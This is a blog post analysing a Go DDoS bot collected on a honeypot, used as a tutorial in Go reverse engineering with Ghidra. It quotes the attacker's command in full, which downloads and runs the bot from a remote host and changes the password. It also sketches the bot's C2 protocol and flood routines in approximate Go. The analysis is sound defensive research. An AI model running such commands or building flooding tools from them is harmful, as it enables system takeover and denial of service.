Ivy Fan-Chiang - Learning Go Binary Reverse Engineering through Malware Analysis


    Posted 2024/11/06

    My last malware-related project covered on this blog was the setup of my honeypot server and some analytics on the traffic it was receiving. I set up that honeypot server with the intention of collecting malware samples to reverse engineer, and this bot was one sample that piqued my interest. Here is my journey into the world of reverse engineering Go binaries and learning how Go works at a low level.[1]

    Threat Intelligence

    Just before we talk about analyzing the binary and Go being weird, here is some basic threat intelligence information.

    Indicators of Compromise

    http://45[.]89[.]28[.]202/bot
    45[.]89[.]28[.]202
    sha256: 20709ae46fc978fcc3498c58852328f4114997b0259f8a2474fa050c0f609fab
    sha1: ba5b0d3f1aa7ca6be55b9ec100c883adf41d9575
    md5: 2be4f5e573b25d434def7a1b2d8e6648
    

    File Information

    File Type: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=HjkOUQdTP3LWmpfPkHeS/c71tNEcp__rNDf2Dahrq/azEhjfHtK4nvNTv5WH_D/B5Ck3lybWWsL94Sp9e2X, stripped

    File Size: 2.21 MB (2321304 bytes)

    DiE Engine Output: ELF: Go(1.10.x-1.17.x)[EXEC AMD64-64]

    GoAnalyzer Output: go1.13.8

    MITRE ATT&CK

    • Discovery
      • T1046: Network Service Discovery
    • Credential Access
      • T1110: Brute Force
        • T1110.001: Password Guessing
        • T1110.003: Password Spraying
    • Initial Access
      • T1078: Valid Accounts
        • T1078.001: Valid Accounts: Default Accounts
      • T1133: External Remote Services
    • Execution
      • T1059: Command and Scripting Interpreter
        • T1059.004: Command and Scripting Interpreter: Unix Shell
    • Defense Evasion
      • T1027: Obfuscated Files or Information
        • T1027.008: Obfuscated Files or Information: Stripped Payloads
    • Command and Control
      • T1095: Non-Application Layer Protocol
      • T1571: Non-Standard Port
    • Impact
      • T1499: Endpoint Denial of Service
        • T1499.001: Endpoint Denial of Service: OS Exhaustion Flood
      • T1498: Network Denial of Service
        • T1498.001: Network Denial of Service: Direct Network Flood

    Initial Attack

    The initial attack on my honeypot for this particular sample occurred on August 7th, 2024. It appears that an automated scanner at 194.50.16.221 (Alsycon B.V. VPS) spotted my “unsecured SSH server” and attempted to run a series of shell commands on the system. The scanner tried this a few times throughout that week, and most attacks looked like the following:

    lscpu | grep "CPU(s):                " &&
    echo -e "JnrmpaEYdWWTJnrmpaEYdWWT" | passwd &&
    pkill bin.x86_64;
    cd /tmp;
    wget http://45.89.28.202/bot;
    curl -s -O http://45.89.28.202/bot;
    chmod 777 bot;
    ./bot;
    iptables -A INPUT -s 194.50.16.26 -j DROP;
    iptables -A INPUT -s 85.239.34.237 -j DROP
    

    Breaking this command down: it first pulls the CPU count out of lscpu and attempts to change the user's password. It then attempts to kill other malware running on the system named bin.x86_64, a pretty common name for malware binaries that I have seen on my honeypot. Afterwards, it tries to download the malware into the /tmp directory using both wget and curl, makes the file executable (chmod 777), and runs it. The final step, which piqued my interest, is that the scanner blocks the IP addresses of competing malware’s command & control (C2) infrastructure using iptables. This was really interesting because port scanning these IP addresses helped me find new web servers and FTP servers filled with more samples to analyze in the future.

    Like the malware sample, the scanner appears to be written in Go as it connected with the SSH client version string SSH-2.0-Go.

    Recovering Symbols and Other Ghidra Setup

    The binary that was acquired is an ELF file that is stripped of debugging symbols. This means we shouldn’t have access to function names and variable names as written by the malware author. However, the Go compiler is very silly and doesn’t strip function names from binaries completely: they are kept in the .gopclntab section of the binary because the Go runtime uses them (for stack traces, for example). This section is a function table that maps each function's address to metadata such as the function name. Luckily, other people have made extensions and scripts for recovering these function names! Personally, I use GolangAnalyzerExtension[2] for Ghidra to recover these function names, string literals, and interface/struct type definitions.
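
    To give a feel for what those tools look for, here is a minimal sketch of locating a pclntab header by its magic number. The magic values match the ones in Go's debug/gosym package; the function name findPclntab, the version hint strings, and the synthetic buffer are my own illustration, and real tools do far more validation than this heuristic.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// Known pclntab header magics (same values as in Go's debug/gosym package).
var pclntabMagics = map[uint32]string{
	0xfffffffb: "Go 1.2 to 1.15",
	0xfffffffa: "Go 1.16 to 1.17",
	0xfffffff0: "Go 1.18 to 1.19",
	0xfffffff1: "Go 1.20+",
}

// findPclntab scans data for something shaped like a little-endian pclntab
// header: a 4-byte magic, two zero bytes, the instruction size quantum
// (1, 2 or 4) and the pointer size (4 or 8). It returns the offset and a
// version hint, or -1 and "" if nothing matched. This is only a heuristic.
func findPclntab(data []byte) (int, string) {
	for off := 0; off+8 <= len(data); off++ {
		hint, ok := pclntabMagics[binary.LittleEndian.Uint32(data[off:])]
		if !ok || data[off+4] != 0 || data[off+5] != 0 {
			continue
		}
		quantum, ptrSize := data[off+6], data[off+7]
		if (quantum == 1 || quantum == 2 || quantum == 4) && (ptrSize == 4 || ptrSize == 8) {
			return off, hint
		}
	}
	return -1, ""
}

func main() {
	// Synthetic buffer: 8 bytes of padding, then a header as an amd64
	// binary built with an older Go release would carry it.
	buf := append([]byte("padding!"), 0xfb, 0xff, 0xff, 0xff, 0x00, 0x00, 0x01, 0x08)
	off, hint := findPclntab(buf)
	fmt.Println(off, hint)
}
```

    On a real sample you would run this over the file contents; for anything beyond a quick check, debug/gosym or GoReSym is the better choice.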


    Another quirk is that Ghidra doesn’t understand Golang strings normally because the string type in Go is defined like this:

    struct string {
      char* ptr;
      int len;
    };
    

    The char* pointer points into the .rodata section of the binary. That section contains a blob of all string literals used by the program and runtime, packed back to back without NUL terminators into one massive string. Each string the program uses is initialized, statically by the compiler or dynamically by the runtime, as a string struct pointing into this blob. This also requires some scripting to help Ghidra understand, but the GolangAnalyzerExtension does this for us 🎉.
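
    A tiny model of that layout, purely for illustration: the goString type and the blob contents below are made up, with an offset standing in for the pointer. It shows why a tool that scans for NUL-terminated C strings sees one long run of text, while a (pointer, length) pair picks out each literal exactly.

```go
package main

import "fmt"

// goString mimics Go's string header: where the bytes start, and how many
// there are. In a real binary, off would be a pointer into .rodata.
type goString struct {
	off    int
	length int
}

// resolve cuts the string's bytes out of the shared blob.
func (s goString) resolve(blob []byte) string {
	return string(blob[s.off : s.off+s.length])
}

func main() {
	// Hypothetical .rodata excerpt: literals packed back to back, no terminators.
	blob := []byte("tcpudp45.89.28.202")

	network := goString{off: 0, length: 3}
	address := goString{off: 6, length: 12}

	fmt.Println(network.resolve(blob)) // tcp
	fmt.Println(address.resolve(blob)) // 45.89.28.202
}
```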

    Type definitions for structs are also bundled into the binary for >= Go 1.5 and can be extracted with GolangAnalyzerExtension or GoReSym.

    Random Quirks about Go

    Most decompilers are designed to decompile binaries to a pseudo-C language, so using them on binaries written in languages like Go usually results in decompiler output that is very messy. Different tasks the Go runtime does, like garbage collection and panic handling, get mixed into the decompiler output, and reading the code involves picking out which instructions belong to the runtime and which belong to the actual program you are reverse engineering. Go also does a lot of other things differently than C/C++, like calling conventions and data types.

    First, let’s look at the Go compiler’s calling convention. A calling convention defines how functions within a program call each other: where arguments are passed and where return values come back. Most compilers targeting x86_64 systems pass arguments in registers and receive return values through registers. Go before version 1.17 (this sample was built with go1.13.8), on the other hand, passes all arguments on the stack and returns values on the stack as well. Most C/C++ compilers also have callee-saved registers that are used for temporary values throughout the execution of a function, whereas Go spills temporaries onto the stack. For more information about the calling convention on an assembly level, Dr. Raphael Poss has a very thorough article on his blog.

    How does this impact us when doing reverse engineering, though? Ghidra expects arguments to be passed through registers and doesn’t really understand Go’s calling convention, especially with optimized binaries. Enabling Decompiler Parameter ID analysis helps somewhat in identifying the number of arguments and return values, but many temporary values and variables will have to be manually analyzed by tracking the use of different stack memory addresses.


    Now onto Go data types. As mentioned earlier, Go doesn’t use regular C-style strings like C/C++. Each string is a struct of a char*-like data pointer and an int value holding the string’s length. Slices are built the same way: a slice is made up of a data pointer to the values in memory, an int value holding the length, and an int capacity value because the size is mutable.[3] This means that when a function has a string or slice argument, you’ll usually see two or three arguments for each string/slice passed in Ghidra’s decompiler output. Interface types also consist of two pointers: one to a vtable (type and method information) and another to the interface data.

    For example, here’s what a call to net.Dial(network, address string) (Conn, error)[4] from the malware’s code looks like in Ghidra:

    net.Dial(
        "tcp",  // network string
        (int)0x3,  // length of "tcp"
        in_stack_ffffffffffffff88,  // pointer to address string
        (int)in_stack_ffffffffffffffa8,   // length of address
        pcVar9,  // Conn data
        in_stack_ffffffffffffff88,  // Conn vtable
        in_stack_ffffffffffffffa8,  // error data
        in_stack_ffffffffffffffb0  // error vtable
    );
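
    The two-word and three-word layouts described above can be checked from Go itself. This is a small sketch (the headerWords helper is my own name) that measures each header in machine words, which is why one string argument turns into two values in the decompiler and one slice into three.

```go
package main

import (
	"fmt"
	"unsafe"
)

// headerWords reports how many machine words a string, a slice and an
// interface value occupy.
func headerWords() (str, slice, iface uintptr) {
	var s string
	var b []byte
	var e error
	word := unsafe.Sizeof(uintptr(0))
	return unsafe.Sizeof(s) / word, unsafe.Sizeof(b) / word, unsafe.Sizeof(e) / word
}

func main() {
	str, slice, iface := headerWords()
	fmt.Println("string:   ", str, "words (pointer, length)")
	fmt.Println("slice:    ", slice, "words (pointer, length, capacity)")
	fmt.Println("interface:", iface, "words (type/method table, data)")
}
```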
    

    With these quirks in mind and remembering that the decompiler output also includes instructions from the Go runtime, reverse engineering Go binaries isn’t too painful with the right tooling, having the Go documentation and standard library source code handy, and a bit of pattern recognition… Most of the work becomes developing an intuition for which instructions belong to the runtime and then ignoring them, translating the rest of the instructions from decompiler output to Go source code. There are also fun quirks in Go’s concurrent Goroutines, WaitGroups,[5] and defer statements, but surely that won’t become a problem for us later.[6]

    Back to the malware

    We figured out how Go works! Now back to the silly little malware that someone tried attacking me with. GolangAnalyzer and GoReSym managed to find this list of functions (note that the names ending with .func1 are compiler-generated names for anonymous functions defined inside the named function):

    main.SendRawTCP
    main.SimulateMinecraftPacket
    main.sendMinecraftPackets
    main.sendLargePackets
    main.sendUDPFlood
    main.sendIPIPAttack
    main.sendTCPJunk
    main.getOutboundIP
    main.handleAttack
    main.handleUDPFlood
    main.handleUDPFlood.func1
    main.handleIPIPAttack
    main.handleIPIPAttack.func1
    main.handleTCPJunkAttack
    main.listenForCommands
    main.main
    main.ensureSingleInstance
    main.ensureSingleInstance.func1
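
    A quick way to see where names like main.handleUDPFlood.func1 come from is to ask the Go runtime what it calls an anonymous function. In this sketch, handleDemo is a hypothetical stand-in for one of the handlers and funcName is a helper of my own; the runtime reports the closure under its parent's name plus a .func1 suffix.

```go
package main

import (
	"fmt"
	"reflect"
	"runtime"
)

// handleDemo is a hypothetical stand-in for a function like
// main.handleUDPFlood. It returns the first anonymous function defined in it.
//
//go:noinline
func handleDemo() func() {
	return func() {}
}

// funcName returns the symbol name the runtime has recorded for fn,
// which must be a function value.
func funcName(fn interface{}) string {
	return runtime.FuncForPC(reflect.ValueOf(fn).Pointer()).Name()
}

func main() {
	fmt.Println(funcName(handleDemo))   // the named function
	fmt.Println(funcName(handleDemo())) // the anonymous function inside it
}
```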
    

    Let’s start by reversing main.main like any sane person doing reverse engineering would do. This function is pretty simple if you ignore all the random instructions the Go runtime is doing: it runs main.ensureSingleInstance, sets up a couple of variables, and calls the main.listenForCommands function (note that any Go code in this section is my best-effort guess at translating Ghidra’s gibberish back to Golang and probably won’t compile):

    func main() {
        for {
            ensureSingleInstance()
            ppid, _, _ := syscall.RawSyscall(syscall.SYS_GETPPID, 0, 0, 0)
            if ppid == 1 {
                if len(os.Args) != 0 {
                    cmd := exec.Command(os.Args[0], os.Args[1])  // os/exec
                    cmd.Start()
                    fmt.Fprintln(os.Stdout, "InfectedNight_did_its_job!")  // writer assumed to be os.Stdout
                    os.Remove(os.Args[0])  // self delete
                    os.Exit(0)  // exit code not recovered, 0 is a guess
                }
                continue
            }
            // the decompiler output jumps here with a goto when ppid != 1
            t := time.Now()
            rand.Seed(t.UnixNano())  // does some seeding based on time (exact expression is a guess)
            int1 := rand.Intn(10)
            int2 := rand.Intn(100)
            s := fmt.Sprintf("[kworker/u%d:%d]", int1, int2)  // arguments are presumably int1 and int2
            listenForCommands("45.89.28.202", 0x13f7)  // connecting to 45.89.28.202:5111
        }
    }
    

    The function has a reference to the InfectedNight Mirai variant, but from what I could find, there is no resemblance between this sample and the InfectedNight sample that IBM X-Force made a report on other than the string “InfectedNight_did_its_job!”.

    main.ensureSingleInstance() is pretty simple: the function opens a TCP listener on a hard-coded port, and if the listener fails to open because a process is already listening on that port, it exits the program.
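
    The trick is a common one, so here is a rough sketch of the idea rather than the sample's actual code. The acquireInstanceLock name is mine, and I bind to 127.0.0.1:0 (an OS-chosen port) so the example runs anywhere; the sample uses its own hard-coded port.

```go
package main

import (
	"fmt"
	"net"
)

// acquireInstanceLock tries to bind addr. Only one listener can hold a TCP
// address at a time, so a bind failure is taken to mean that another
// instance is already running.
func acquireInstanceLock(addr string) (net.Listener, error) {
	return net.Listen("tcp", addr)
}

func main() {
	first, err := acquireInstanceLock("127.0.0.1:0")
	if err != nil {
		fmt.Println("could not bind:", err)
		return
	}
	defer first.Close()

	// A second attempt on the same address fails while the first is open.
	_, err = acquireInstanceLock(first.Addr().String())
	fmt.Println("second instance blocked:", err != nil)
}
```

    The lock disappears as soon as the process dies, which is presumably why malware likes it: no stale lock files to clean up.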

    main.listenForCommands() is where the code gets interesting. This function contacts the C2 server over TCP, performs a custom handshake, and then continuously listens for binary encoded commands. My understanding of the handshake and custom TCP protocol is shaky because by the time I stopped procrastinating on this project, the C2 server had been taken down 😭 and I couldn’t try dynamic analysis against it. The function does make clear that commands include a command number, a victim IP, and an attack duration, and that a switch statement[7] dispatches 4 different attack types plus a command to kill the malware:

    func listenForCommands(c2_addr string, port int) {
        for {
            for {
                for {  // why so many nested infinite loops???
                    addr := fmt.Sprintf("%s:%d", c2_addr, port)
                    conn, err := net.Dial("tcp", addr)  // connect to c2
                    if err == nil {
                        break
                    }
                    time.Sleep(5 * time.Second)  // 5000000000 in the binary, time.Duration counts nanoseconds
                }
                var arr [5]byte  // handshake stuff
                arr = 0x0100000042  // constant as Ghidra shows it
                n, err := conn.Write(arr[:])
                if err == nil {
                    break
                }
                n, err = conn.Read()
            }
            var arr [1]byte
            arr[0] = 5
            n, err := conn.Write([]byte("\x01"))
            if err == nil {
                break
            }
            n, err = conn.Read()
        }
        n, err := conn.Write([]byte("CNC01"))
        if err == nil {
            for {
                input := make([]byte, 0x20)
                n, err := conn.Read(input)
                if err != nil {
                    break
                }
                if n < 0xd && bytes.HasPrefix(input, []byte("\x00\x0e\x00\x00\x00")) {
                    // the command
                    duration := input[5]
                    attack_type := input[6]
                    victim := net.IP(input[8:12]).String()

                    switch attack_type {
                    case 0:
                        go handleAttack(victim, duration)
                    case 1:
                        go handleUDPFlood(victim, duration)
                    case 2:
                        go handleIPIPAttack(victim, duration)
                    case 3:
                        go handleTCPJunkAttack(victim, duration)
                    case 99:
                        os.Exit(0)
                    }
                }
            }
        }
    }
    

    If you know anything about Go, you’ll notice that this is our first function with concurrency! The code above has silly syntax where it says go f() which is calling that function as a Goroutine.

    Super fast intro to Goroutines and WaitGroups: A Goroutine lets you split a function off into its own lightweight thread, scheduled by the Go runtime, so that you can do tasks concurrently. However, if you split a task off and want to wait for it to finish, you need some way of knowing when it is complete. This is what WaitGroups do: they are basically a counter of how many Goroutines are still active. By passing a pointer to the WaitGroup to the Goroutine as an argument, the Goroutine can decrement the counter when it has finished executing.
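
    In code, that pattern looks roughly like this. It is a generic sketch, not taken from the sample; worker and runWorkers are names I picked for the example.

```go
package main

import (
	"fmt"
	"sync"
	"sync/atomic"
)

// worker does its (trivial) job and tells the WaitGroup when it is finished.
func worker(wg *sync.WaitGroup, done *int64) {
	defer wg.Done() // decrement the counter when this Goroutine returns
	atomic.AddInt64(done, 1)
}

// runWorkers starts n Goroutines, waits for all of them, and returns how
// many of them ran.
func runWorkers(n int) int64 {
	var wg sync.WaitGroup
	var done int64
	for i := 0; i < n; i++ {
		wg.Add(1) // one more Goroutine in flight
		go worker(&wg, &done)
	}
	wg.Wait() // blocks until the counter is back at zero
	return atomic.LoadInt64(&done)
}

func main() {
	fmt.Println(runWorkers(8))
}
```

    Note that wg.Add(1) happens before the go statement; calling it inside the Goroutine would race with wg.Wait().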

    Why did I mention that these would become a problem earlier? Because Ghidra struggles to produce comprehensible decompiler output when Goroutines are called! The line go handleAttack(victim, duration) ends up looking like this in Ghidra:

    [Screenshot: Ghidra decompiler output showing a call to runtime.newproc]

    The runtime.newproc function is how Goroutines are actually implemented, but this output has no information about the Goroutine’s arguments! Finding the arguments for the Goroutine basically involves reverse engineering the routine’s function signature, staring at the assembly to see what is at the top of the stack at the given moment, and making educated guesses about what the function expects. I said reverse engineering Go wasn’t toooooooooo painful, right? Surely this won’t be the only weird Golang construct that will give us problems…

    Anyways, I love the super descriptive function names we are getting, it’s funny that our attacker tried to hide these names from us by stripping the binary and the Go compiler included them anyway. Let’s continue down the rabbit hole of questionable design decisions in these attacks.
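
    Before moving on, the command layout from listenForCommands can be written down as a small parser, which is handy if you ever want to decode captured C2 traffic. Treat it as a sketch under heavy assumptions: the field offsets come straight from my static reconstruction (5-byte header, duration at byte 5, attack type at byte 6, victim IPv4 at bytes 8 to 11) and were never confirmed against a live server. The command type, parseCommand, and the example packet are all made up for illustration.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"net"
)

// Assumed fixed header of a command packet (from static analysis only).
var commandHeader = []byte{0x00, 0x0e, 0x00, 0x00, 0x00}

// command holds the fields the bot appears to read from a packet.
type command struct {
	Duration   byte
	AttackType byte
	Victim     net.IP
}

// parseCommand decodes buf according to the assumed layout.
func parseCommand(buf []byte) (command, error) {
	if len(buf) < 12 {
		return command{}, errors.New("short packet")
	}
	if !bytes.HasPrefix(buf, commandHeader) {
		return command{}, errors.New("unexpected header")
	}
	victim := make(net.IP, 4)
	copy(victim, buf[8:12])
	return command{Duration: buf[5], AttackType: buf[6], Victim: victim}, nil
}

func main() {
	// Hypothetical packet: duration 30, attack type 1, victim 192.0.2.10
	// (an address reserved for documentation).
	pkt := []byte{0x00, 0x0e, 0x00, 0x00, 0x00, 30, 1, 0, 192, 0, 2, 10}
	cmd, err := parseCommand(pkt)
	fmt.Println(cmd.Duration, cmd.AttackType, cmd.Victim, err)
}
```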

    handleAttack()

    I started looking at this function thinking it would be a pretty standard TCP packet spam attack… but wait, what’s sendMinecraftPackets()? Also, we have our first use of WaitGroups here!

    func handleAttack(victim string, duration byte) {
        outbound_ip := getOutboundIP()
        var wg sync.WaitGroup
        wg.Add(1)
        go sendMinecraftPackets(victim, outbound_ip, duration, &wg)
        wg.Wait()
        for i := 0; i < THREADS; i++ {  // THREADS is a constant in the binary
            wg.Add(1)
            go sendLargePackets(victim, outbound_ip, duration, &wg)
        }
        wg.Wait()
    }
    

    Turns out our malware author decided the most effective way of doing a TCP packet spam attack was to simultaneously send large TCP packets and simulated Minecraft packets, for some reason. Those two functions look something like this:

    func sendMinecraftPackets(victim string, outbound string, duration byte, wg *sync.WaitGroup) {
        defer wg.Done()
        start := time.Now()
        end := start.Add(time.Duration(duration))
        for time.Now().Before(end) {
            packet := SimulateMinecraftPacket()  // creates a simulated minecraft packet
            SendRawTCP(victim, outbound, wg, packet)
            n := rand.Intn(500)  // math/rand
            time.Sleep(time.Duration(n+500) * time.Millisecond)  // (n+500) * 1000000 ns, so 0.5 to just under 1 second
        }
    }

    func sendLargePackets(victim string, outbound string, duration byte, wg *sync.WaitGroup) {
        defer wg.Done()
        start := time.Now()
        end := start.Add(time.Duration(duration))
        for time.Now().Before(end) {
            packet := bytes.Repeat([]byte{0x41}, 0x400)  // 'A' * 0x400
            SendRawTCP(victim, outbound, wg, packet)
            n := rand.Intn(500)  // math/rand
            time.Sleep(time.Duration(n+500) * time.Millisecond)
        }
    }
    

    You might notice we have another weird Golang construct here, the defer statement! A defer statement schedules a function call to run when the surrounding function returns, and is usually used for cleanup. These also look very weird in our decompiler output and are something you have to look out for. The defer statement itself looks like this: [screenshot image-20241104020014001], and the return statement of any function with a defer statement ends up looking like this: [screenshot image-20241104020306703].

    Looking out for these lines in your decompiler output lets you know what function is being deferred and when it eventually gets called. In this case, the function defers calling the Done() method of our handleAttack() function’s WaitGroup, letting the parent function know that the routine is finished by decrementing the WaitGroup counter when it is done running. defer statements are also used throughout the program to close network sockets when a function completes execution.
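
    If defer is new to you, this small standalone example (not from the sample; trace is my own name) shows the two properties that matter when reading the decompiler output: deferred calls run when the function returns, and they run in reverse order of registration.

```go
package main

import "fmt"

// trace records the order in which its body and its deferred calls run.
// The named result lets the deferred closures append to what is returned.
func trace() (events []string) {
	defer func() { events = append(events, "deferred first, runs last") }()
	defer func() { events = append(events, "deferred second, runs first") }()
	events = append(events, "body")
	return events
}

func main() {
	for _, e := range trace() {
		fmt.Println(e)
	}
}
```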

    SendRawTCP and SimulateMinecraftPacket are pretty simple functions that send TCP data using sockets and generate Minecraft packet data respectively.
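
    One last note on the sleep calls in these functions: time.Sleep takes a time.Duration, which is an int64 count of nanoseconds, so the decompiler shows sleeps as large integer constants such as 5000000000 or (n + 500) * 1000000. A short sketch of the conversion (the jitter and retryDelay helpers are my own names):

```go
package main

import (
	"fmt"
	"time"
)

// jitter rewrites the decompiled expression (n + 500) * 1000000 as a Duration.
func jitter(n int) time.Duration {
	return time.Duration(n+500) * time.Millisecond
}

// retryDelay is the raw constant from the reconnect loop, typed as a Duration.
func retryDelay() time.Duration {
	return time.Duration(5000000000)
}

func main() {
	fmt.Println(retryDelay() == 5*time.Second) // same value, nicer spelling
	fmt.Println(jitter(0), jitter(499))        // shortest and longest sleep for n in [0, 500)
}
```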

    handleUDPFlood(), handleIPIPAttack(), and handleTCPJunkAttack()

    With all the quirks of Golang finally out of the way for the rest of this binary, figuring out what each function and attack does isn’t too hard. None of the other attacks have as questionable or interesting code as handleAttack() 😔.

    All the attack functions are broken down into one top-level handle[attack_name]() function that handles WaitGroups and launches Goroutines to make attacks run with multiple threads, a handle[attack_name].func1() anonymous function (a closure inside the handler) that handles decrementing the WaitGroup, and lastly a send[attack_name]() function that has the implementation of the actual attack.

    handleUDPFlood() is a simple UDP data spam attack that just spams random data at the target.

    handleIPIPAttack() is an implementation of an IP fragmentation attack. It uses a custom IPv4Header struct that GolangAnalyzer defined for us.

    handleTCPJunkAttack() appears to be a SYN flood attack. It uses a custom TCPHeader struct.

    And just like that, we’ve figured out everything that the malware bot does! It is a simple DDoS bot that communicates with a C2 server over raw TCP and implements 4 different types of DDoS attacks using Goroutines for concurrency.

    Overall thoughts

    I tried searching around grep.app and GitHub to see if the code for this malware got leaked on GitHub, or it was reused code. The function name SimulateMinecraftPacket seemed unique enough that if it existed, I would find a match. Nothing showed up, which seems to suggest the malware author wrote this code from scratch.

    The lack of any cryptography, the hard-coded information like C2 IPs, and the lack of any detection evasion other than self-deletion seem to suggest that the malware author is not very competent. I wish that the C2 server this malware used was still up so that I could try dynamically testing this sample and dissect its network protocol completely. Alas, that is not the case, so I got as much information as I could statically.

    However, it was a fun exercise in learning how Go binaries work and discovering all the weird quirks of the language! Might take a break from malware research for now and look at doing some vulnerability research projects. Thanks for reading!


    1. I was also learning Go as a programming language at the same time, having never really worked with it before. This is the worst possible way to learn Go: if you are actually interested in the language, decompiling it is a pretty painful way to go about it. 

    2. An amazing Ghidra extension that I am now the Nixpkgs package maintainer for! 

    3. strings in Go are not mutable and as such don’t have a capacity value 

    4. func Dial(network, address string) (Conn, error) for those unfamiliar with Go syntax means two arguments named network and address of type string, and two return values that are of type net.Conn and error 

    5. Definitely did not need to call a friend who works for Google to get him to explain WaitGroups properly to me… /s 

    6. ”…reverse-engineering Go binaries is about as fun as pulling teeth from an adorable blue gopher.” - Emily Trau (2022) 

    7. The switch statement was basically a really weird double-nested if-else statement for some reason… “Wait till you learn that switch statements is actually syntactic sugar for if-else” - my friend at Google